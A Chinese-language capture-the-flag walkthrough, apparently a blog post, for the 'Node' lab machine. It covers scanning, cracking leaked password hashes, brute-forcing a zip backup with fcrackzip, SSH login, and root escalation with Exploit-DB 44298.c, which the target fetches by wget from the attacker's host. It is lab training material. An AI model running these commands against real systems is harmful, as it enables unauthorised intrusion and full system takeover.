靶机7:Node

Node靶机

1.信息收集

arp-scan -l 扫描

arp-scan -l

2.nmap扫描

nmap -sV -p- 192.168.26.130 -T4

查看3000端口

查看源码分析大量js

访问/assets/js/app/controllers/home.js发现目录

访问        /api/users/latest

发现密码

发现密文

2.cmd5解密

解密结果

tom :spongebob

mark : snowflake

restarting : 未搜到

登陆后发现都没有权限

查看他的上一级后发现多出一个密码

解密:myP14ceAdm1nAcc0uNT:manchester

登录

发现要下载文件

下载到了Downloads

用cat查看一下

可以很显然的看出为base64加密,所以使用base64进行解密

base64 -d myplace.backup > wj.backup

查看解密后的文件类型

file wj.backup

可以看到文件类型为zip,所以将后缀改为zip的格式

mv wj.backup wj.zip

然后解压压缩包

unzip wj.zip

3.fcrackzip爆破

发现是要密码,所以这里使用fcrackzip进行爆破

fcrackzip -u -D -p rockyou.txt /home/kali/Downloads/wj.zip

爆破出密码 magicword

再次解压

解压后发现目录多出一个var

去到/var/www/myplace目录下查看app.js

发现用户和密码,上面扫描出22端口,我们尝试远程登录

账户:mark

密码:5AYRft73VtFpc84k

登陆成功

查看sudo权限

发现没有权限,查看suid权限

find / -perm -u=s -type f 2>/dev/null

发现也没有

4.版本漏洞提权

查看其内核及操作系统版本

uname -a
lsb_release -a

搜索Ubuntu 16.04存在的漏洞

searchsploit linux 4.4.0 ubuntu

可以使用44298.c进行提权
将44298.c下载到本地

searchsploit -m 44298.c

然后将攻击脚本传到对方服务器上
kali:

python -m SimpleHTTPServer 800

靶机:

wget http://192.168.26.129:800/44298.c

编译

gcc 44298.c -o exp

攻击

查看root

发现flag 成功

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值